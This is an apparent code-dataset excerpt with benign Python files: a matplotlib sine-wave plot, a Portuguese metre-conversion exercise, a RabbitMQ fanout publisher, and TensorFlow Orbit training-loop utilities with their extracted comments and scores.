results (dict): key is username, value is score # get the sheet # figure out the last row # now loop through the results and add to sheet Gets week results from sheet Args: week (int): the week of results Creates summary table of results | 2.978388 | 3 |
Graphing/Example1.py | Wadden12/Semester1 | 0 | 9160 | <gh_stars>0
#!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show() | #!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show() | fr | 0.386793 | #!/usr/bin/python3 | 3.25503 | 3 |
Cursoemvideo/desafios/desafio008.py | gentildf/Python | 1 | 9161 | #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros.
n = float(input('\033[32mDigite o numero:\033[m'))
print('O número digitado é \033[33m{0:.0f}m\033[m.\n'
      'Ele apresentado em centimetros fica \033[33m{1:.2f}cm\033[m.\n'
      'Apresentado em milímetros fica \033[33m{2:.3f}mm\033[m'
      .format(n, n * 100, n * 1000))
#print('O número em metros é {0}.\n
# O número em convertido para centimetros é {1}.\n
# O número convertido para milimetros é {2}'
# .format(n, n/100, n/1000))
| #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros.
n = float(input('\033[32mDigite o numero:\033[m'))
print('O número digitado é \033[33m{0:.0f}m\033[m.\n'
      'Ele apresentado em centimetros fica \033[33m{1:.2f}cm\033[m.\n'
      'Apresentado em milímetros fica \033[33m{2:.3f}mm\033[m'
      .format(n, n * 100, n * 1000))
#print('O número em metros é {0}.\n
# O número em convertido para centimetros é {1}.\n
# O número convertido para milimetros é {2}'
# .format(n, n/100, n/1000))
| pt | 0.942059 | #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros. #print('O número em metros é {0}.\n # O número em convertido para centimetros é {1}.\n # O número convertido para milimetros é {2}' # .format(n, n/100, n/1000)) | 4.05996 | 4 |
publish_fanout.py | Dordoloy/BachelorDIM-Lectures-Algorithms-2019 | 0 | 9162 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
# Parse CLODUAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
channel.basic_publish(exchange='posts',
routing_key='',
body='message')
print("send")
publish_fanout() | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
# Parse CLODUAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
channel.basic_publish(exchange='posts',
routing_key='',
body='message')
print("send")
publish_fanout() | en | 0.632426 | # -*- coding: utf-8 -*- Created on Mon Oct 21 08:47:08 2019 @author: dordoloy # Parse CLODUAMQP_URL (fallback to localhost) # Connect to CloudAMQP | 2.740541 | 3 |
orbit/utils.py | xjx0524/models | 0 | 9163 | # Copyright 2020 The Orbit Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Some layered modules/functions to help users writing custom training loop."""
import abc
import contextlib
import functools
import inspect
import os
import numpy as np
import tensorflow as tf
def create_loop_fn(step_fn):
"""Creates a multiple steps function driven by the python while loop.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
    A callable defined as the `loop_fn` definition below.
"""
def loop_fn(iterator, num_steps, state=None, reduce_fn=None):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. If `num_steps==-1`, will
      iterate until exhausting the iterator.
state: An optional initial state before running the loop.
reduce_fn: a callable defined as `def reduce_fn(state, value)`, where
`value` is the outputs from `step_fn`.
Returns:
The updated state.
"""
try:
step = 0
# To make sure the OutOfRangeError exception can be handled well with
# async remote eager, we need to wrap the loop body in a `async_scope`.
with tf.experimental.async_scope():
while (num_steps == -1 or step < num_steps):
outputs = step_fn(iterator)
if reduce_fn is not None:
state = reduce_fn(state, outputs)
step += 1
return state
except (StopIteration, tf.errors.OutOfRangeError):
tf.experimental.async_clear_error()
return state
return loop_fn
def create_tf_while_loop_fn(step_fn):
"""Create a multiple steps function driven by tf.while_loop on the host.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
    A callable defined as the `loop_fn` definition below.
"""
def loop_fn(iterator, num_steps):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. Must be a tf.Tensor.
"""
if not isinstance(num_steps, tf.Tensor):
raise ValueError("`num_steps` should be an `tf.Tensor`. Python object "
"may cause retracing.")
for _ in tf.range(num_steps):
step_fn(iterator)
return loop_fn
def create_global_step() -> tf.Variable:
"""Creates a `tf.Variable` suitable for use as a global step counter.
Creating and managing a global step variable may be necessary for
`AbstractTrainer` subclasses that perform multiple parameter updates per
`Controller` "step", or use different optimizers on different steps.
In these cases, an `optimizer.iterations` property generally can't be used
directly, since it would correspond to parameter updates instead of iterations
in the `Controller`'s training loop. Such use cases should simply call
`step.assign_add(1)` at the end of each step.
Returns:
A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the
first replica's value retained when synchronizing across replicas in
a distributed setting.
"""
return tf.Variable(
0,
dtype=tf.int64,
trainable=False,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA)
def make_distributed_dataset(strategy, dataset_or_fn, *args, **kwargs):
"""A helper function to create distributed dataset.
Args:
strategy: An instance of `tf.distribute.Strategy`.
    dataset_or_fn: An instance of `tf.data.Dataset` or a function which takes an
`tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If
it is a function, it could optionally have an argument named
`input_context` which is `tf.distribute.InputContext` argument type.
*args: The list of arguments to be passed to dataset_or_fn.
**kwargs: Any keyword arguments to be passed.
Returns:
A distributed Dataset.
"""
if strategy is None:
strategy = tf.distribute.get_strategy()
if isinstance(dataset_or_fn, tf.data.Dataset):
return strategy.experimental_distribute_dataset(dataset_or_fn)
if not callable(dataset_or_fn):
raise ValueError("`dataset_or_fn` should be either callable or an instance "
"of `tf.data.Dataset`")
def dataset_fn(ctx):
"""Wrapped dataset function for creating distributed dataset.."""
# If `dataset_or_fn` is a function and has `input_context` as argument
# names, pass `ctx` as the value of `input_context` when calling
# `dataset_or_fn`. Otherwise `ctx` will not be used when calling
# `dataset_or_fn`.
argspec = inspect.getfullargspec(dataset_or_fn)
args_names = argspec.args
if "input_context" in args_names:
kwargs["input_context"] = ctx
ds = dataset_or_fn(*args, **kwargs)
return ds
return strategy.experimental_distribute_datasets_from_function(dataset_fn)
class SummaryManager:
"""A class manages writing summaries."""
def __init__(self, summary_dir, summary_fn, global_step=None):
"""Construct a summary manager object.
Args:
summary_dir: the directory to write summaries.
summary_fn: A callable defined as `def summary_fn(name, tensor,
step=None)`, which describes the summary operation.
global_step: A `tf.Variable` instance for the global step.
"""
self._enabled = (summary_dir is not None)
self._summary_dir = summary_dir
self._summary_fn = summary_fn
    self._summary_writers = {}
if global_step is None:
self._global_step = tf.summary.experimental.get_step()
else:
self._global_step = global_step
def summary_writer(self, relative_path=""):
"""Returns the underlying summary writer.
Args:
relative_path: The current path in which to write summaries, relative to
the summary directory. By default it is empty, which specifies the root
directory.
"""
if self._summary_writers and relative_path in self._summary_writers:
return self._summary_writers[relative_path]
if self._enabled:
self._summary_writers[relative_path] = tf.summary.create_file_writer(
os.path.join(self._summary_dir, relative_path))
else:
self._summary_writers[relative_path] = tf.summary.create_noop_writer()
return self._summary_writers[relative_path]
def flush(self):
"""Flush the underlying summary writers."""
if self._enabled:
tf.nest.map_structure(tf.summary.flush, self._summary_writers)
def write_summaries(self, summary_dict):
"""Write summaries for the given values.
This recursively creates subdirectories for any nested dictionaries
provided in `summary_dict`, yielding a hierarchy of directories which will
then be reflected in the TensorBoard UI as different colored curves.
    E.g. users may evaluate on multiple datasets and return `summary_dict` as a
nested dictionary.
```
{
"dataset": {
"loss": loss,
"accuracy": accuracy
},
"dataset2": {
"loss": loss2,
"accuracy": accuracy2
},
}
```
This will create two subdirectories "dataset" and "dataset2" inside the
summary root directory. Each directory will contain event files including
both "loss" and "accuracy" summaries.
Args:
summary_dict: A dictionary of values. If any value in `summary_dict` is
itself a dictionary, then the function will recursively create
subdirectories with names given by the keys in the dictionary. The
Tensor values are summarized using the summary writer instance specific
to the parent relative path.
"""
if not self._enabled:
return
self._write_summaries(summary_dict)
def _write_summaries(self, summary_dict, relative_path=""):
for name, value in summary_dict.items():
if isinstance(value, dict):
self._write_summaries(
value, relative_path=os.path.join(relative_path, name))
else:
with self.summary_writer(relative_path).as_default():
self._summary_fn(name, value, step=self._global_step)
class Trigger(metaclass=abc.ABCMeta):
"""An abstract class representing a "trigger" for some event."""
@abc.abstractmethod
def __call__(self, value: float, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: Whether the trigger is forced triggered.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
@abc.abstractmethod
def reset(self):
"""Reset states in the trigger."""
class IntervalTrigger(Trigger):
"""Triggers on every fixed interval."""
def __init__(self, interval, start=0):
"""Constructs the IntervalTrigger.
Args:
interval: The triggering interval.
start: An initial value for the trigger.
"""
self._interval = interval
self._last_trigger_value = start
def __call__(self, value, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: If True, the trigger will be forced triggered unless the
last trigger value is equal to `value`.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
if force_trigger and value != self._last_trigger_value:
self._last_trigger_value = value
return True
if self._interval and self._interval > 0:
if value >= self._last_trigger_value + self._interval:
self._last_trigger_value = value
return True
return False
def reset(self):
"""See base class."""
self._last_trigger_value = 0
class EpochHelper:
"""A Helper class to handle epochs in Customized Training Loop."""
def __init__(self, epoch_steps, global_step):
"""Constructs the EpochHelper.
Args:
epoch_steps: An integer indicates how many steps in an epoch.
global_step: A `tf.Variable` instance indicates the current global step.
"""
self._epoch_steps = epoch_steps
self._global_step = global_step
self._current_epoch = None
self._epoch_start_step = None
self._in_epoch = False
def epoch_begin(self):
"""Returns whether a new epoch should begin."""
if self._in_epoch:
return False
current_step = self._global_step.numpy()
self._epoch_start_step = current_step
self._current_epoch = current_step // self._epoch_steps
self._in_epoch = True
return True
def epoch_end(self):
"""Returns whether the current epoch should end."""
if not self._in_epoch:
raise ValueError("`epoch_end` can only be called inside an epoch")
current_step = self._global_step.numpy()
epoch = current_step // self._epoch_steps
if epoch > self._current_epoch:
self._in_epoch = False
return True
return False
@property
def batch_index(self):
"""Index of the next batch within the current epoch."""
return self._global_step.numpy() - self._epoch_start_step
@property
def current_epoch(self):
return self._current_epoch
@contextlib.contextmanager
def _soft_device_placement():
"""Context manager for soft device placement, allowing summaries on CPU."""
original_setting = tf.config.get_soft_device_placement()
try:
tf.config.set_soft_device_placement(True)
yield
finally:
tf.config.set_soft_device_placement(original_setting)
def train_function_with_summaries(*args, **kwargs):
"""Utility function to support TPU summaries via multiple `tf.function`s.
This permits interleaving summaries inside TPU-compatible code, but without
any performance impact on steps that do not write summaries.
Usage is as a decorator, similar to `tf.function`, and any `tf.function`
arguments will be passed through if supplied:
@trainer.train_function_with_summaries
def train(self, num_steps):
...
The decorated function is assumed to be a loop method accepting a `num_steps`
parameter, as for instance would be called within the `Controller`'s outer
train loop. The implementation here assumes that `summary_frequency` is
divisible by `steps_per_loop`. The decorated method should accept two
arguments, `self` and `num_steps`.
Two `tf.function` versions of `train_fn` are created: one inside a summary
writer scope with soft device placement enabled (used on steps that require
summary writing), and one with no summary writer present and soft device
placement disabled (used on all other steps).
Args:
*args: Arguments to pass through to `tf.function`.
**kwargs: Keyword arguments to pass through to `tf.function`.
Returns:
If the first argument is a callable, returns the decorated callable.
Otherwise, returns a decorator.
"""
def decorator(train_fn):
# TODO(dhr): Validate the signature of train_fn?
train_fn_with_summaries = tf.function(train_fn, *args, **kwargs)
train_fn_without_summaries = tf.function(train_fn, *args, **kwargs)
@functools.wraps(train_fn)
def wrapper(self, num_steps):
if tf.summary.should_record_summaries():
with _soft_device_placement():
output = train_fn_with_summaries(self, tf.constant(1))
num_steps -= 1
if num_steps >= 1:
with tf.summary.record_if(False):
output = train_fn_without_summaries(self, num_steps)
return output
return wrapper
if args and callable(args[0]):
train_fn, args = args[0], args[1:]
return decorator(train_fn)
return decorator
def get_value(x) -> np.ndarray:
"""Returns the value of a variable/tensor.
Args:
x: input variable.
Returns:
    A Numpy array or number.
"""
if not tf.is_tensor(x):
return x
return x.numpy()
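# Illustrative sketch added by the editor (not part of the original module):
# one way `create_loop_fn` and `SummaryManager` could be wired together in a
# toy eager loop. The dataset, step function and summary directory below are
# placeholders, not part of the Orbit API.
def _example_usage(summary_dir="/tmp/orbit_summaries"):
  dataset = tf.data.Dataset.from_tensor_slices(tf.range(10.0)).batch(2)
  iterator = iter(dataset)
  global_step = tf.Variable(0, dtype=tf.int64)
  manager = SummaryManager(summary_dir, tf.summary.scalar,
                           global_step=global_step)
  def step_fn(it):
    # One "step": read a batch, bump the step counter, return a scalar metric.
    batch = next(it)
    global_step.assign_add(1)
    return tf.reduce_mean(batch)
  loop_fn = create_loop_fn(step_fn)
  # Keep only the most recent step output as the loop "state".
  last = loop_fn(iterator, num_steps=2, state=None,
                 reduce_fn=lambda state, out: out)
  manager.write_summaries({"mean_batch_value": last})
  manager.flush()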
 | # Copyright 2020 The Orbit Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Some layered modules/functions to help users writing custom training loop."""
import abc
import contextlib
import functools
import inspect
import os
import numpy as np
import tensorflow as tf
def create_loop_fn(step_fn):
"""Creates a multiple steps function driven by the python while loop.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
    A callable defined as the `loop_fn` definition below.
"""
def loop_fn(iterator, num_steps, state=None, reduce_fn=None):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. If `num_steps==-1`, will
      iterate until exhausting the iterator.
state: An optional initial state before running the loop.
reduce_fn: a callable defined as `def reduce_fn(state, value)`, where
`value` is the outputs from `step_fn`.
Returns:
The updated state.
"""
try:
step = 0
# To make sure the OutOfRangeError exception can be handled well with
# async remote eager, we need to wrap the loop body in a `async_scope`.
with tf.experimental.async_scope():
while (num_steps == -1 or step < num_steps):
outputs = step_fn(iterator)
if reduce_fn is not None:
state = reduce_fn(state, outputs)
step += 1
return state
except (StopIteration, tf.errors.OutOfRangeError):
tf.experimental.async_clear_error()
return state
return loop_fn
def create_tf_while_loop_fn(step_fn):
"""Create a multiple steps function driven by tf.while_loop on the host.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
    A callable defined as the `loop_fn` definition below.
"""
def loop_fn(iterator, num_steps):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. Must be a tf.Tensor.
"""
if not isinstance(num_steps, tf.Tensor):
raise ValueError("`num_steps` should be an `tf.Tensor`. Python object "
"may cause retracing.")
for _ in tf.range(num_steps):
step_fn(iterator)
return loop_fn
def create_global_step() -> tf.Variable:
"""Creates a `tf.Variable` suitable for use as a global step counter.
Creating and managing a global step variable may be necessary for
`AbstractTrainer` subclasses that perform multiple parameter updates per
`Controller` "step", or use different optimizers on different steps.
In these cases, an `optimizer.iterations` property generally can't be used
directly, since it would correspond to parameter updates instead of iterations
in the `Controller`'s training loop. Such use cases should simply call
`step.assign_add(1)` at the end of each step.
Returns:
A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the
first replica's value retained when synchronizing across replicas in
a distributed setting.
"""
return tf.Variable(
0,
dtype=tf.int64,
trainable=False,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA)
def make_distributed_dataset(strategy, dataset_or_fn, *args, **kwargs):
"""A helper function to create distributed dataset.
Args:
strategy: An instance of `tf.distribute.Strategy`.
    dataset_or_fn: An instance of `tf.data.Dataset` or a function which takes an
`tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If
it is a function, it could optionally have an argument named
`input_context` which is `tf.distribute.InputContext` argument type.
*args: The list of arguments to be passed to dataset_or_fn.
**kwargs: Any keyword arguments to be passed.
Returns:
A distributed Dataset.
"""
if strategy is None:
strategy = tf.distribute.get_strategy()
if isinstance(dataset_or_fn, tf.data.Dataset):
return strategy.experimental_distribute_dataset(dataset_or_fn)
if not callable(dataset_or_fn):
raise ValueError("`dataset_or_fn` should be either callable or an instance "
"of `tf.data.Dataset`")
def dataset_fn(ctx):
"""Wrapped dataset function for creating distributed dataset.."""
# If `dataset_or_fn` is a function and has `input_context` as argument
# names, pass `ctx` as the value of `input_context` when calling
# `dataset_or_fn`. Otherwise `ctx` will not be used when calling
# `dataset_or_fn`.
argspec = inspect.getfullargspec(dataset_or_fn)
args_names = argspec.args
if "input_context" in args_names:
kwargs["input_context"] = ctx
ds = dataset_or_fn(*args, **kwargs)
return ds
return strategy.experimental_distribute_datasets_from_function(dataset_fn)
class SummaryManager:
"""A class manages writing summaries."""
def __init__(self, summary_dir, summary_fn, global_step=None):
"""Construct a summary manager object.
Args:
summary_dir: the directory to write summaries.
summary_fn: A callable defined as `def summary_fn(name, tensor,
step=None)`, which describes the summary operation.
global_step: A `tf.Variable` instance for the global step.
"""
self._enabled = (summary_dir is not None)
self._summary_dir = summary_dir
self._summary_fn = summary_fn
    self._summary_writers = {}
if global_step is None:
self._global_step = tf.summary.experimental.get_step()
else:
self._global_step = global_step
def summary_writer(self, relative_path=""):
"""Returns the underlying summary writer.
Args:
relative_path: The current path in which to write summaries, relative to
the summary directory. By default it is empty, which specifies the root
directory.
"""
if self._summary_writers and relative_path in self._summary_writers:
return self._summary_writers[relative_path]
if self._enabled:
self._summary_writers[relative_path] = tf.summary.create_file_writer(
os.path.join(self._summary_dir, relative_path))
else:
self._summary_writers[relative_path] = tf.summary.create_noop_writer()
return self._summary_writers[relative_path]
def flush(self):
"""Flush the underlying summary writers."""
if self._enabled:
tf.nest.map_structure(tf.summary.flush, self._summary_writers)
def write_summaries(self, summary_dict):
"""Write summaries for the given values.
This recursively creates subdirectories for any nested dictionaries
provided in `summary_dict`, yielding a hierarchy of directories which will
then be reflected in the TensorBoard UI as different colored curves.
    E.g. users may evaluate on multiple datasets and return `summary_dict` as a
nested dictionary.
```
{
"dataset": {
"loss": loss,
"accuracy": accuracy
},
"dataset2": {
"loss": loss2,
"accuracy": accuracy2
},
}
```
This will create two subdirectories "dataset" and "dataset2" inside the
summary root directory. Each directory will contain event files including
both "loss" and "accuracy" summaries.
Args:
summary_dict: A dictionary of values. If any value in `summary_dict` is
itself a dictionary, then the function will recursively create
subdirectories with names given by the keys in the dictionary. The
Tensor values are summarized using the summary writer instance specific
to the parent relative path.
"""
if not self._enabled:
return
self._write_summaries(summary_dict)
def _write_summaries(self, summary_dict, relative_path=""):
for name, value in summary_dict.items():
if isinstance(value, dict):
self._write_summaries(
value, relative_path=os.path.join(relative_path, name))
else:
with self.summary_writer(relative_path).as_default():
self._summary_fn(name, value, step=self._global_step)
class Trigger(metaclass=abc.ABCMeta):
"""An abstract class representing a "trigger" for some event."""
@abc.abstractmethod
def __call__(self, value: float, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: Whether the trigger is forced triggered.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
@abc.abstractmethod
def reset(self):
"""Reset states in the trigger."""
class IntervalTrigger(Trigger):
"""Triggers on every fixed interval."""
def __init__(self, interval, start=0):
"""Constructs the IntervalTrigger.
Args:
interval: The triggering interval.
start: An initial value for the trigger.
"""
self._interval = interval
self._last_trigger_value = start
def __call__(self, value, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: If True, the trigger will be forced triggered unless the
last trigger value is equal to `value`.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
if force_trigger and value != self._last_trigger_value:
self._last_trigger_value = value
return True
if self._interval and self._interval > 0:
if value >= self._last_trigger_value + self._interval:
self._last_trigger_value = value
return True
return False
def reset(self):
"""See base class."""
self._last_trigger_value = 0
class EpochHelper:
"""A Helper class to handle epochs in Customized Training Loop."""
def __init__(self, epoch_steps, global_step):
"""Constructs the EpochHelper.
Args:
epoch_steps: An integer indicates how many steps in an epoch.
global_step: A `tf.Variable` instance indicates the current global step.
"""
self._epoch_steps = epoch_steps
self._global_step = global_step
self._current_epoch = None
self._epoch_start_step = None
self._in_epoch = False
def epoch_begin(self):
"""Returns whether a new epoch should begin."""
if self._in_epoch:
return False
current_step = self._global_step.numpy()
self._epoch_start_step = current_step
self._current_epoch = current_step // self._epoch_steps
self._in_epoch = True
return True
def epoch_end(self):
"""Returns whether the current epoch should end."""
if not self._in_epoch:
raise ValueError("`epoch_end` can only be called inside an epoch")
current_step = self._global_step.numpy()
epoch = current_step // self._epoch_steps
if epoch > self._current_epoch:
self._in_epoch = False
return True
return False
@property
def batch_index(self):
"""Index of the next batch within the current epoch."""
return self._global_step.numpy() - self._epoch_start_step
@property
def current_epoch(self):
return self._current_epoch
@contextlib.contextmanager
def _soft_device_placement():
"""Context manager for soft device placement, allowing summaries on CPU."""
original_setting = tf.config.get_soft_device_placement()
try:
tf.config.set_soft_device_placement(True)
yield
finally:
tf.config.set_soft_device_placement(original_setting)
def train_function_with_summaries(*args, **kwargs):
"""Utility function to support TPU summaries via multiple `tf.function`s.
This permits interleaving summaries inside TPU-compatible code, but without
any performance impact on steps that do not write summaries.
Usage is as a decorator, similar to `tf.function`, and any `tf.function`
arguments will be passed through if supplied:
@trainer.train_function_with_summaries
def train(self, num_steps):
...
The decorated function is assumed to be a loop method accepting a `num_steps`
parameter, as for instance would be called within the `Controller`'s outer
train loop. The implementation here assumes that `summary_frequency` is
divisible by `steps_per_loop`. The decorated method should accept two
arguments, `self` and `num_steps`.
Two `tf.function` versions of `train_fn` are created: one inside a summary
writer scope with soft device placement enabled (used on steps that require
summary writing), and one with no summary writer present and soft device
placement disabled (used on all other steps).
Args:
*args: Arguments to pass through to `tf.function`.
**kwargs: Keyword arguments to pass through to `tf.function`.
Returns:
If the first argument is a callable, returns the decorated callable.
Otherwise, returns a decorator.
"""
def decorator(train_fn):
# TODO(dhr): Validate the signature of train_fn?
train_fn_with_summaries = tf.function(train_fn, *args, **kwargs)
train_fn_without_summaries = tf.function(train_fn, *args, **kwargs)
@functools.wraps(train_fn)
def wrapper(self, num_steps):
if tf.summary.should_record_summaries():
with _soft_device_placement():
output = train_fn_with_summaries(self, tf.constant(1))
num_steps -= 1
if num_steps >= 1:
with tf.summary.record_if(False):
output = train_fn_without_summaries(self, num_steps)
return output
return wrapper
if args and callable(args[0]):
train_fn, args = args[0], args[1:]
return decorator(train_fn)
return decorator
def get_value(x) -> np.ndarray:
"""Returns the value of a variable/tensor.
Args:
x: input variable.
Returns:
    A Numpy array or number.
"""
if not tf.is_tensor(x):
return x
return x.numpy()
| en | 0.760127 | # Lint as: python3 # Copyright 2020 The Orbit Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== Some layered modules/functions to help users writing custom training loop. Creates a multiple steps function driven by the python while loop. Args: step_fn: A function which takes `iterator` as input. Returns: A callable defined as the `loop_fn` defination below. A loop function with multiple steps. Args: iterator: A nested structure of tf.data `Iterator` or `DistributedIterator`. num_steps: The number of steps in the loop. If `num_steps==-1`, will iterate until exausting the iterator. state: An optional initial state before running the loop. reduce_fn: a callable defined as `def reduce_fn(state, value)`, where `value` is the outputs from `step_fn`. Returns: The updated state. # To make sure the OutOfRangeError exception can be handled well with # async remote eager, we need to wrap the loop body in a `async_scope`. Create a multiple steps function driven by tf.while_loop on the host. Args: step_fn: A function which takes `iterator` as input. Returns: A callable defined as the `loop_fn` defination below. A loop function with multiple steps. Args: iterator: A nested structure of tf.data `Iterator` or `DistributedIterator`. num_steps: The number of steps in the loop. Must be a tf.Tensor. Creates a `tf.Variable` suitable for use as a global step counter. Creating and managing a global step variable may be necessary for `AbstractTrainer` subclasses that perform multiple parameter updates per `Controller` "step", or use different optimizers on different steps. In these cases, an `optimizer.iterations` property generally can't be used directly, since it would correspond to parameter updates instead of iterations in the `Controller`'s training loop. Such use cases should simply call `step.assign_add(1)` at the end of each step. Returns: A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the first replica's value retained when synchronizing across replicas in a distributed setting. A helper function to create distributed dataset. Args: strategy: An instance of `tf.distribute.Strategy`. dataset_or_fn: A instance of `tf.data.Dataset` or a function which takes an `tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If it is a function, it could optionally have an argument named `input_context` which is `tf.distribute.InputContext` argument type. *args: The list of arguments to be passed to dataset_or_fn. **kwargs: Any keyword arguments to be passed. Returns: A distributed Dataset. Wrapped dataset function for creating distributed dataset.. # If `dataset_or_fn` is a function and has `input_context` as argument # names, pass `ctx` as the value of `input_context` when calling # `dataset_or_fn`. Otherwise `ctx` will not be used when calling # `dataset_or_fn`. A class manages writing summaries. Construct a summary manager object. 
Args: summary_dir: the directory to write summaries. summary_fn: A callable defined as `def summary_fn(name, tensor, step=None)`, which describes the summary operation. global_step: A `tf.Variable` instance for the global step. Returns the underlying summary writer. Flush the underlying summary writer. Write a bulk of summaries. Args: items: a dictionary of `Tensors` for writing summaries. # TODO(rxsang): Support writing summaries with nested structure, so users # can split the summaries into different directories for nicer visualization # in Tensorboard, like train and eval metrics. Returns the underlying summary writer. Args: relative_path: The current path in which to write summaries, relative to the summary directory. By default it is empty, which specifies the root directory. Flush the underlying summary writers. Write summaries for the given values. This recursively creates subdirectories for any nested dictionaries provided in `summary_dict`, yielding a hierarchy of directories which will then be reflected in the TensorBoard UI as different colored curves. E.g. users may evaluate on muliple datasets and return `summary_dict` as a nested dictionary. ``` { "dataset": { "loss": loss, "accuracy": accuracy }, "dataset2": { "loss": loss2, "accuracy": accuracy2 }, } ``` This will create two subdirectories "dataset" and "dataset2" inside the summary root directory. Each directory will contain event files including both "loss" and "accuracy" summaries. Args: summary_dict: A dictionary of values. If any value in `summary_dict` is itself a dictionary, then the function will recursively create subdirectories with names given by the keys in the dictionary. The Tensor values are summarized using the summary writer instance specific to the parent relative path. An abstract class representing a "trigger" for some event. Maybe trigger the event based on the given value. Args: value: the value for triggering. force_trigger: Whether the trigger is forced triggered. Returns: `True` if the trigger is triggered on the given `value`, and `False` otherwise. Reset states in the trigger. Triggers on every fixed interval. Constructs the IntervalTrigger. Args: interval: The triggering interval. start: An initial value for the trigger. Maybe trigger the event based on the given value. Args: value: the value for triggering. force_trigger: If True, the trigger will be forced triggered unless the last trigger value is equal to `value`. Returns: `True` if the trigger is triggered on the given `value`, and `False` otherwise. See base class. A Helper class to handle epochs in Customized Training Loop. Constructs the EpochHelper. Args: epoch_steps: An integer indicates how many steps in an epoch. global_step: A `tf.Variable` instance indicates the current global step. Returns whether a new epoch should begin. Returns whether the current epoch should end. Index of the next batch within the current epoch. Context manager for soft device placement, allowing summaries on CPU. Utility function to support TPU summaries via multiple `tf.function`s. This permits interleaving summaries inside TPU-compatible code, but without any performance impact on steps that do not write summaries. Usage is as a decorator, similar to `tf.function`, and any `tf.function` arguments will be passed through if supplied: @trainer.train_function_with_summaries def train(self, num_steps): ... 
